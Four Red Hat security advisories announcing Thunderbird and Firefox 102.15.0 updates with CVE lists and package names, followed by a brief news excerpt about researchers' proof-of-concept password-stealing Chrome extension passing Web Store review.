Red Hat Security Advisory 2023-4947-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.15.0.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:4947-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4947  
Issue date:        2023-09-04  
CVE Names:         CVE-2023-4051 CVE-2023-4053 CVE-2023-4573   
                   CVE-2023-4574 CVE-2023-4575 CVE-2023-4577   
                   CVE-2023-4578 CVE-2023-4580 CVE-2023-4581   
                   CVE-2023-4583 CVE-2023-4584 CVE-2023-4585   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.15.0.

Security Fix(es):

* Mozilla: Memory corruption in IPC CanvasTranslator (CVE-2023-4573)

* Mozilla: Memory corruption in IPC ColorPickerShownCallback  
(CVE-2023-4574)

* Mozilla: Memory corruption in IPC FilePickerShownCallback (CVE-2023-4575)

* Mozilla: Memory corruption in JIT UpdateRegExpStatics (CVE-2023-4577)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15,  
Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
(CVE-2023-4584)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and  
Thunderbird 115.2 (CVE-2023-4585)

* Mozilla: Full screen notification obscured by file open dialog  
(CVE-2023-4051)

* Mozilla: Full screen notification obscured by external program  
(CVE-2023-4053)

* Mozilla: Error reporting methods in SpiderMonkey could have triggered an  
Out of Memory Exception (CVE-2023-4578)

* Mozilla: Push notifications saved to disk unencrypted (CVE-2023-4580)

* Mozilla: XLL file extensions were downloadable without warnings  
(CVE-2023-4581)

* Mozilla: Browsing Context potentially not cleared when closing Private  
Window (CVE-2023-4583)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2236071 - CVE-2023-4573 Mozilla: Memory corruption in IPC CanvasTranslator  
2236072 - CVE-2023-4574 Mozilla: Memory corruption in IPC ColorPickerShownCallback  
2236073 - CVE-2023-4575 Mozilla: Memory corruption in IPC FilePickerShownCallback  
2236075 - CVE-2023-4577 Mozilla: Memory corruption in JIT UpdateRegExpStatics  
2236076 - CVE-2023-4051 Mozilla: Full screen notification obscured by file open dialog  
2236077 - CVE-2023-4578 Mozilla: Error reporting methods in SpiderMonkey could have triggered an Out of Memory Exception  
2236078 - CVE-2023-4053 Mozilla: Full screen notification obscured by external program  
2236079 - CVE-2023-4580 Mozilla: Push notifications saved to disk unencrypted  
2236080 - CVE-2023-4581 Mozilla: XLL file extensions were downloadable without warnings  
2236082 - CVE-2023-4583 Mozilla: Browsing Context potentially not cleared when closing Private Window  
2236084 - CVE-2023-4584 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15, Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
2236086 - CVE-2023-4585 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
thunderbird-102.15.0-1.el9_0.src.rpm

aarch64:  
thunderbird-102.15.0-1.el9_0.aarch64.rpm  
thunderbird-debuginfo-102.15.0-1.el9_0.aarch64.rpm  
thunderbird-debugsource-102.15.0-1.el9_0.aarch64.rpm

ppc64le:  
thunderbird-102.15.0-1.el9_0.ppc64le.rpm  
thunderbird-debuginfo-102.15.0-1.el9_0.ppc64le.rpm  
thunderbird-debugsource-102.15.0-1.el9_0.ppc64le.rpm

s390x:  
thunderbird-102.15.0-1.el9_0.s390x.rpm  
thunderbird-debuginfo-102.15.0-1.el9_0.s390x.rpm  
thunderbird-debugsource-102.15.0-1.el9_0.s390x.rpm

x86_64:  
thunderbird-102.15.0-1.el9_0.x86_64.rpm  
thunderbird-debuginfo-102.15.0-1.el9_0.x86_64.rpm  
thunderbird-debugsource-102.15.0-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-4051  
https://access.redhat.com/security/cve/CVE-2023-4053  
https://access.redhat.com/security/cve/CVE-2023-4573  
https://access.redhat.com/security/cve/CVE-2023-4574  
https://access.redhat.com/security/cve/CVE-2023-4575  
https://access.redhat.com/security/cve/CVE-2023-4577  
https://access.redhat.com/security/cve/CVE-2023-4578  
https://access.redhat.com/security/cve/CVE-2023-4580  
https://access.redhat.com/security/cve/CVE-2023-4581  
https://access.redhat.com/security/cve/CVE-2023-4583  
https://access.redhat.com/security/cve/CVE-2023-4584  
https://access.redhat.com/security/cve/CVE-2023-4585  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk9itMAAoJENzjgjWX9erElaUQAJ6imjlYrp2SE9yph3dtT7zU  
FEtTZLTkZDmUT/OE+CBCH+4znore7zb7TMWUErJQRU36+388A9tfio8VHlA9wlXn  
MdjFCkm1vGrvPrlxYgZfEa7dnsepxE4m5ADHed3b5EG+6vKVvZaM+Etq1fDjJJpT  
au7ewdG/O4oD71+5c7zs309Ry8FQIMvmjOq5lxIMxpiebrA+4XFAXOpGJy7jqO2y  
A0InkdR3mg486FKohZp1M9apAVrM4ui2KSndwdfTIgz3ySVJ/++uqmGukIfE2EgN  
fn9z6WEw4xT3GOuhL2FIyK6Mbm6VWsd8S4E/i6RiajxoIh9GJ5mlSI1Pe4eHWlTk  
ar7q+r1NymxOzPlT8h294bzfAs48j173QzVHuyCt9BT8PNXOv/FetaUXNO8YLY1Q  
4v59BfsdlUjdAW4lu9vIuRzgJ6XOw/U0KFoR0sEG9WKTKw0JwaAaiDKIlVc11Zvx  
R7rf/5aNcpapN3AkCf66XWZQ0UGO5NjQfA7aJw9hUzzSFdgTvPOocb8xR8lQTMje  
y4aWDVlm/PpjvZYySJucyDu9YHDPaYr4V6BycSgtyR/G41IpvODr5pEbVhSDpYUf  
6NSGKsUtXpHpc3ulXL5h5XJ8r90LEspl3f7NaHUawhZczKY8PTo4w20Fo4d48erl  
c5OIr9FbHuMy26OXOWgT  
=M34e  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4947-01

Red Hat Security Advisory 2023-4948-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.15.0.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:4948-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4948  
Issue date:        2023-09-04  
CVE Names:         CVE-2023-4051 CVE-2023-4053 CVE-2023-4573   
                   CVE-2023-4574 CVE-2023-4575 CVE-2023-4577   
                   CVE-2023-4578 CVE-2023-4580 CVE-2023-4581   
                   CVE-2023-4583 CVE-2023-4584 CVE-2023-4585   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - ppc64le, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.15.0.

Security Fix(es):

* Mozilla: Memory corruption in IPC CanvasTranslator (CVE-2023-4573)

* Mozilla: Memory corruption in IPC ColorPickerShownCallback  
(CVE-2023-4574)

* Mozilla: Memory corruption in IPC FilePickerShownCallback (CVE-2023-4575)

* Mozilla: Memory corruption in JIT UpdateRegExpStatics (CVE-2023-4577)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15,  
Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
(CVE-2023-4584)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and  
Thunderbird 115.2 (CVE-2023-4585)

* Mozilla: Full screen notification obscured by file open dialog  
(CVE-2023-4051)

* Mozilla: Full screen notification obscured by external program  
(CVE-2023-4053)

* Mozilla: Error reporting methods in SpiderMonkey could have triggered an  
Out of Memory Exception (CVE-2023-4578)

* Mozilla: Push notifications saved to disk unencrypted (CVE-2023-4580)

* Mozilla: XLL file extensions were downloadable without warnings  
(CVE-2023-4581)

* Mozilla: Browsing Context potentially not cleared when closing Private  
Window (CVE-2023-4583)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2236071 - CVE-2023-4573 Mozilla: Memory corruption in IPC CanvasTranslator  
2236072 - CVE-2023-4574 Mozilla: Memory corruption in IPC ColorPickerShownCallback  
2236073 - CVE-2023-4575 Mozilla: Memory corruption in IPC FilePickerShownCallback  
2236075 - CVE-2023-4577 Mozilla: Memory corruption in JIT UpdateRegExpStatics  
2236076 - CVE-2023-4051 Mozilla: Full screen notification obscured by file open dialog  
2236077 - CVE-2023-4578 Mozilla: Error reporting methods in SpiderMonkey could have triggered an Out of Memory Exception  
2236078 - CVE-2023-4053 Mozilla: Full screen notification obscured by external program  
2236079 - CVE-2023-4580 Mozilla: Push notifications saved to disk unencrypted  
2236080 - CVE-2023-4581 Mozilla: XLL file extensions were downloadable without warnings  
2236082 - CVE-2023-4583 Mozilla: Browsing Context potentially not cleared when closing Private Window  
2236084 - CVE-2023-4584 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15, Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
2236086 - CVE-2023-4585 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
thunderbird-102.15.0-1.el8_1.src.rpm

ppc64le:  
thunderbird-102.15.0-1.el8_1.ppc64le.rpm  
thunderbird-debuginfo-102.15.0-1.el8_1.ppc64le.rpm  
thunderbird-debugsource-102.15.0-1.el8_1.ppc64le.rpm

x86_64:  
thunderbird-102.15.0-1.el8_1.x86_64.rpm  
thunderbird-debuginfo-102.15.0-1.el8_1.x86_64.rpm  
thunderbird-debugsource-102.15.0-1.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-4051  
https://access.redhat.com/security/cve/CVE-2023-4053  
https://access.redhat.com/security/cve/CVE-2023-4573  
https://access.redhat.com/security/cve/CVE-2023-4574  
https://access.redhat.com/security/cve/CVE-2023-4575  
https://access.redhat.com/security/cve/CVE-2023-4577  
https://access.redhat.com/security/cve/CVE-2023-4578  
https://access.redhat.com/security/cve/CVE-2023-4580  
https://access.redhat.com/security/cve/CVE-2023-4581  
https://access.redhat.com/security/cve/CVE-2023-4583  
https://access.redhat.com/security/cve/CVE-2023-4584  
https://access.redhat.com/security/cve/CVE-2023-4585  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk9itJAAoJENzjgjWX9erEUUkP/jsj6a8MM9sgC1sGOTjUNPAN  
9iWKLTNlXfJouv6sLLN5YrV1ui5uFBaCdqFe0PN3aCNHxig9nS3dpqB0K+h0XniA  
5OaTN9VSodVCGca9A+HvbvZs6mEcdGbQSu915WeKxFiFwG25Du44JLOleI2ctBhU  
BhTZ2mSfoVP7SoF85o3CDEkkVduoW1hcdW9PFwVUazIYotJfmscGzfgb1/WrNMiH  
SJauPKm6kM9CUKCQqDTUeB2h2ihHUZhLnnOtKeyG98f6ul3HCAaKKNcy996C7MCa  
Gw3WzjAT0r9GLu4l2+9PxivmgpLsNLdYmdFiTgpITfn2oVdul74ZA2zyTD+Zarzp  
bjht6BgWv6v7yZxKxqI50LjeqeOnxuOZ6P7MJdfpCwS7esrBopml958dPYcobxyX  
k+Y6eEOSmpk48wNX6XmFNJglmKKB/w6z8GfVvULkp89xmVAXKG4MwyzF5TNzsWzm  
jNEuvPaJrEwVyjcHRLzH+f+g1mXd3QO/yzOayyXqL4eqnS4r6Tra+9odbLkl0Tei  
2L819IgXR3/Ia1lBECytxFv32veKCUcU4891L+3SQ5WnVA16mDn8NEigmILi6Y2F  
lmPufMrU44oKRaPZZBg7cHMwjfkV0B2QC81k38ITNlhQTJCxjEVtcQUqkYZ0vwGb  
rNP1SQIk1w1wPvAF8Q+P  
=95Ts  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4948-01

Red Hat Security Advisory 2023-4945-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.15.0.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:4945-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4945  
Issue date:        2023-09-04  
CVE Names:         CVE-2023-4051 CVE-2023-4053 CVE-2023-4573   
                   CVE-2023-4574 CVE-2023-4575 CVE-2023-4577   
                   CVE-2023-4578 CVE-2023-4580 CVE-2023-4581   
                   CVE-2023-4583 CVE-2023-4584 CVE-2023-4585   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64le, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.15.0.

Security Fix(es):

* Mozilla: Memory corruption in IPC CanvasTranslator (CVE-2023-4573)

* Mozilla: Memory corruption in IPC ColorPickerShownCallback  
(CVE-2023-4574)

* Mozilla: Memory corruption in IPC FilePickerShownCallback (CVE-2023-4575)

* Mozilla: Memory corruption in JIT UpdateRegExpStatics (CVE-2023-4577)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15,  
Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
(CVE-2023-4584)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and  
Thunderbird 115.2 (CVE-2023-4585)

* Mozilla: Full screen notification obscured by file open dialog  
(CVE-2023-4051)

* Mozilla: Full screen notification obscured by external program  
(CVE-2023-4053)

* Mozilla: Error reporting methods in SpiderMonkey could have triggered an  
Out of Memory Exception (CVE-2023-4578)

* Mozilla: Push notifications saved to disk unencrypted (CVE-2023-4580)

* Mozilla: XLL file extensions were downloadable without warnings  
(CVE-2023-4581)

* Mozilla: Browsing Context potentially not cleared when closing Private  
Window (CVE-2023-4583)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2236071 - CVE-2023-4573 Mozilla: Memory corruption in IPC CanvasTranslator  
2236072 - CVE-2023-4574 Mozilla: Memory corruption in IPC ColorPickerShownCallback  
2236073 - CVE-2023-4575 Mozilla: Memory corruption in IPC FilePickerShownCallback  
2236075 - CVE-2023-4577 Mozilla: Memory corruption in JIT UpdateRegExpStatics  
2236076 - CVE-2023-4051 Mozilla: Full screen notification obscured by file open dialog  
2236077 - CVE-2023-4578 Mozilla: Error reporting methods in SpiderMonkey could have triggered an Out of Memory Exception  
2236078 - CVE-2023-4053 Mozilla: Full screen notification obscured by external program  
2236079 - CVE-2023-4580 Mozilla: Push notifications saved to disk unencrypted  
2236080 - CVE-2023-4581 Mozilla: XLL file extensions were downloadable without warnings  
2236082 - CVE-2023-4583 Mozilla: Browsing Context potentially not cleared when closing Private Window  
2236084 - CVE-2023-4584 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15, Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
2236086 - CVE-2023-4585 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
thunderbird-102.15.0-1.el7_9.src.rpm

x86_64:  
thunderbird-102.15.0-1.el7_9.x86_64.rpm  
thunderbird-debuginfo-102.15.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

Source:  
thunderbird-102.15.0-1.el7_9.src.rpm

ppc64le:  
thunderbird-102.15.0-1.el7_9.ppc64le.rpm  
thunderbird-debuginfo-102.15.0-1.el7_9.ppc64le.rpm

x86_64:  
thunderbird-102.15.0-1.el7_9.x86_64.rpm  
thunderbird-debuginfo-102.15.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
thunderbird-102.15.0-1.el7_9.src.rpm

x86_64:  
thunderbird-102.15.0-1.el7_9.x86_64.rpm  
thunderbird-debuginfo-102.15.0-1.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-4051  
https://access.redhat.com/security/cve/CVE-2023-4053  
https://access.redhat.com/security/cve/CVE-2023-4573  
https://access.redhat.com/security/cve/CVE-2023-4574  
https://access.redhat.com/security/cve/CVE-2023-4575  
https://access.redhat.com/security/cve/CVE-2023-4577  
https://access.redhat.com/security/cve/CVE-2023-4578  
https://access.redhat.com/security/cve/CVE-2023-4580  
https://access.redhat.com/security/cve/CVE-2023-4581  
https://access.redhat.com/security/cve/CVE-2023-4583  
https://access.redhat.com/security/cve/CVE-2023-4584  
https://access.redhat.com/security/cve/CVE-2023-4585  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk9is9AAoJENzjgjWX9erE68wQAIMSm9oVnzWYupXOeuL84tkT  
nUNiw3S8/ynrFXqUhlKN+0xp3geNZkw0GJ8VZiweZ2UFYa0u4f0CrkM+cQ+qG+SL  
I+gV/QmXG+ruGnO1ebp40e5S+T96UT3+qT+C1bJyqcfFCAkqX/8H1dVUgMFja+S4  
Os0hVlRAT1ta7tPW937PYXCYvRQsa9JUc6fdmevHfkdcAn8peohsoC4+G2IPIpvc  
FABKrAKjy1RhRG2u0SOvB3LVlsBhGStiMPgAc+V6a0lOQgq548SvW75WVvr+CjaQ  
etAeAj3ar25Hvunj/C7VP151jga049+sCWeaJdzJ17+K1i2ldIXHswnOgVW3wijp  
+D7Eh7afISrTFM5199oX/cBrDYwUNUxcYo1+xwCmUSY5LS/bOjKoUmrwVOGAgobP  
jppk9RFxXLVhgyT4vR1bpaJh4LtJMcEpfOjWqqnK5WoZ2Efj6sd7grrsk9jJkxOD  
rfVWntD7BT/Mzs8ORwG5O45zWI9Z57UjYwD8KNxmdUiIq2XJG+5uTZf6RTcmvZKQ  
X+z5fZ0wN/3blLOlJM1M2OSVwLJCM2Eb6m5s2b/4vHOg9OkIqlfvgazwg+k8EbjQ  
2wAg8H48nYWaSPVcdiJcTzgKgmolOQIeWos5XveS7gHKUzH9Omwh3JMtHtfesM1J  
cqcuy0sqPWTy+ZI2aH7e  
=6Pq2  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4945-01

Red Hat Security Advisory 2023-4950-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.15.0 ESR.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:4950-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4950  
Issue date:        2023-09-04  
CVE Names:         CVE-2023-4051 CVE-2023-4053 CVE-2023-4573   
                   CVE-2023-4574 CVE-2023-4575 CVE-2023-4577   
                   CVE-2023-4578 CVE-2023-4580 CVE-2023-4581   
                   CVE-2023-4583 CVE-2023-4584 CVE-2023-4585   
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.15.0 ESR.

Security Fix(es):

* Mozilla: Memory corruption in IPC CanvasTranslator (CVE-2023-4573)

* Mozilla: Memory corruption in IPC ColorPickerShownCallback  
(CVE-2023-4574)

* Mozilla: Memory corruption in IPC FilePickerShownCallback (CVE-2023-4575)

* Mozilla: Memory corruption in JIT UpdateRegExpStatics (CVE-2023-4577)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15,  
Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
(CVE-2023-4584)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and  
Thunderbird 115.2 (CVE-2023-4585)

* Mozilla: Full screen notification obscured by file open dialog  
(CVE-2023-4051)

* Mozilla: Full screen notification obscured by external program  
(CVE-2023-4053)

* Mozilla: Error reporting methods in SpiderMonkey could have triggered an  
Out of Memory Exception (CVE-2023-4578)

* Mozilla: Push notifications saved to disk unencrypted (CVE-2023-4580)

* Mozilla: XLL file extensions were downloadable without warnings  
(CVE-2023-4581)

* Mozilla: Browsing Context potentially not cleared when closing Private  
Window (CVE-2023-4583)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2236071 - CVE-2023-4573 Mozilla: Memory corruption in IPC CanvasTranslator  
2236072 - CVE-2023-4574 Mozilla: Memory corruption in IPC ColorPickerShownCallback  
2236073 - CVE-2023-4575 Mozilla: Memory corruption in IPC FilePickerShownCallback  
2236075 - CVE-2023-4577 Mozilla: Memory corruption in JIT UpdateRegExpStatics  
2236076 - CVE-2023-4051 Mozilla: Full screen notification obscured by file open dialog  
2236077 - CVE-2023-4578 Mozilla: Error reporting methods in SpiderMonkey could have triggered an Out of Memory Exception  
2236078 - CVE-2023-4053 Mozilla: Full screen notification obscured by external program  
2236079 - CVE-2023-4580 Mozilla: Push notifications saved to disk unencrypted  
2236080 - CVE-2023-4581 Mozilla: XLL file extensions were downloadable without warnings  
2236082 - CVE-2023-4583 Mozilla: Browsing Context potentially not cleared when closing Private Window  
2236084 - CVE-2023-4584 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15, Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
2236086 - CVE-2023-4585 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
firefox-102.15.0-1.el9_0.src.rpm

aarch64:  
firefox-102.15.0-1.el9_0.aarch64.rpm  
firefox-debuginfo-102.15.0-1.el9_0.aarch64.rpm  
firefox-debugsource-102.15.0-1.el9_0.aarch64.rpm

ppc64le:  
firefox-102.15.0-1.el9_0.ppc64le.rpm  
firefox-debuginfo-102.15.0-1.el9_0.ppc64le.rpm  
firefox-debugsource-102.15.0-1.el9_0.ppc64le.rpm

s390x:  
firefox-102.15.0-1.el9_0.s390x.rpm  
firefox-debuginfo-102.15.0-1.el9_0.s390x.rpm  
firefox-debugsource-102.15.0-1.el9_0.s390x.rpm

x86_64:  
firefox-102.15.0-1.el9_0.x86_64.rpm  
firefox-debuginfo-102.15.0-1.el9_0.x86_64.rpm  
firefox-debugsource-102.15.0-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-4051  
https://access.redhat.com/security/cve/CVE-2023-4053  
https://access.redhat.com/security/cve/CVE-2023-4573  
https://access.redhat.com/security/cve/CVE-2023-4574  
https://access.redhat.com/security/cve/CVE-2023-4575  
https://access.redhat.com/security/cve/CVE-2023-4577  
https://access.redhat.com/security/cve/CVE-2023-4578  
https://access.redhat.com/security/cve/CVE-2023-4580  
https://access.redhat.com/security/cve/CVE-2023-4581  
https://access.redhat.com/security/cve/CVE-2023-4583  
https://access.redhat.com/security/cve/CVE-2023-4584  
https://access.redhat.com/security/cve/CVE-2023-4585  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk9is7AAoJENzjgjWX9erE68EP/Rjo8UtnwJRWUHf1yfaP8SQM  
TgypPyYgm5aIQDKWR0QRAlvOHg2kJl1IEffnDRGJIXdQy+2/AXLAGHt7mHjbKcdG  
KfsLo302w663wtlbh2nGz4+CyWHGvMMni7Z0nYCscoaacV7U7Lu2rysISNjOMCQe  
mmVJampdsmbZ7L6KLocPIAVaSOakZGkaWGRPfSZj7zIinEYREe+jzi7I92uOQZNf  
0i2hH1b76k4IJhxCej9z7JNdRgP+fx2wjF0JjmNZUK6vbieqLVR1wDCtnLFTVpyH  
PwGYbmsL6Dq+y8lIB+tbrvbC9CZ5vCUAkoeWxe/PmCITyGoWdkEGyclawZN4PRto  
aLtUhgpHfmME7jhzloPTUxhn8ccv0249pcPVDL+XqkXEFcg2dGj5NUlTjUWOh/yp  
noJabo3eziF3GDh9L8FeQF+BL1OT5oxrlFragRY2Dc1uvELQo9qEc7hwbIvA6TkL  
3n6gaJrc/y5NII3eucM7WSZUWaFBS0JyE+6QbFYrNMfDgouL8lJC1RgkFGA0rJ2r  
xR+y2IUp2VfVeoWXTle4UrDIQDkIWjRfa81nfyEYfG4WDgvt+ssVXSZ2AOdm5Vih  
b1gD8txdVs4Ao24U7sggxO77Haar1A5jUQnKhiDHMVhMjzjoBiBAXQ6Bw+zGDz6i  
c9py38wStJ68SWaCREj3  
=fC7+  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4950-01

Chrome browser extensions can steal passwords from the text input fields in websites, despite Chrome's latest security and privacy standard, Manifest V3.



(Read more...)




The post Password-stealing Chrome extension smuggled on to Web Store appeared first on Malwarebytes Labs.

Researchers at the University of Wisconsin–Madison have demonstrated that Chrome browser extensions can steal passwords from the text input fields in websites, even if the extension is compliant with Chrome's latest security and privacy standard, Manifest V3.

To prove it, they created a proof of concept browser extension that could steal passwords and put it through the Chrome Web Store review process.

Browser extentions are small applications like ad blockers and password managers that extend the capabilities of browsers. In order to do what they do they enjoy a high degree of access to both the web browser and the pages the browser displays. This creates a significant challenge for vendors like Google.

